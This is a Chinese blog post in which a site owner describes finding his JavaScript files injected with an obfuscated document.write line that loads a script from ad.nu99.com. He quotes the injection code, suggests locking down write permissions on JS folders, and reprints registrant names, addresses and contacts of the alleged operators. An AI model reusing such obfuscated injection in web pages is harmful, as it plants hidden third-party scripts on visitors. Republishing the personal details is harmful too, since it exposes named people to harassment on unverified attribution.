最近网站被挂了一个JS广告,导向nu99.com。通过查看网页源文件,关键字无从查询。
通过开发人员工具,可以找到<script type="mce-text/javascript" src="http://ad.nu99.com/ip.asp?loc=beijing"></script>,应该是嵌入了某个js脚本。
网上搜索了一下此站劣迹斑斑,再次挂墙吧。附上搜索到的一些资料
最安全的防范是,无论是虚拟空间还是VPS,最好关闭JS文件夹的写入权限。
通过对另存后的静态页面中的js代码进行屏蔽,最终发现问题还是出现在自己的js代码中。js首尾并没有异常,一步步的排查在脚本中部发现如下代码。
document.write("<\163cr"+"ipt src='http://\141d."+"\156u9"+"9"+".\143om"+"/ip."+"asp?loc"+"=beijing'><\/scr"+"ipt>");
这是一段对写入内容做了编码的代码,其目的就是为了不让站长可以直接查询到,因此无法定位问题所在。如此恶心的挂马,悭吝之极。 nu99.com在2011年的时候似乎已经开始作恶,也有各大站长对其曝光,这里我们转载这些信息,让各位站长小心
Name : Li DeSI
Organization : Guangzhou WeiZhi Soft
Address : Room 850,building No.1, JIayiYuan,No 445,North Road,Guangzhou
City : guangzhoushi
Province/State : guangdongsheng
Country : china
Postal Code : 510410
Phone Number : 86-020-7829898
Fax : 86-020-7829898
Email : hasom@foxmail.com
hasom@foxmail.com下的其他域名:wa66.com oy66.com zom123.net mp3tj.com
ICP网站备案信息:
备案/许可证号: 粤ICP备09164785号 审核通过时间: 2009-09-07
主办单位名称: 钟艺
域名:wa66.com oy66.com zom123.net
备案/许可证号: 粤ICP备09132699号 审核通过时间: 2009-07-20
主办单位名称: 罗新华
域名:mp3tj.com
之所以在这里列出改域名所有人的一些信息,不仅是想谴责下那些别有用心的挂马人,更希望饱受过该人骚扰的同学继续努力,找出真凶,为营造和谐互联网而努力!
此外,通过对服务器同IP网站发现,其他凡是有JS的站都有迹象被挂马。挂马并不是每个js都被注入,可以说关键JS才被添加类似的代码,并且loc"+"=beijing' 似乎也根据各个网站而不同,以上让人不难想到此台服务器已被攻破,抑或服务商内鬼所为。
- 本文固定链接: https://www.fengshen.cn/2012/12/劣迹斑斑臭名昭著的nu99-com/diyofwind/
- 转载请注明: fengshen 发表于 Dream of Wind | 一梦风神
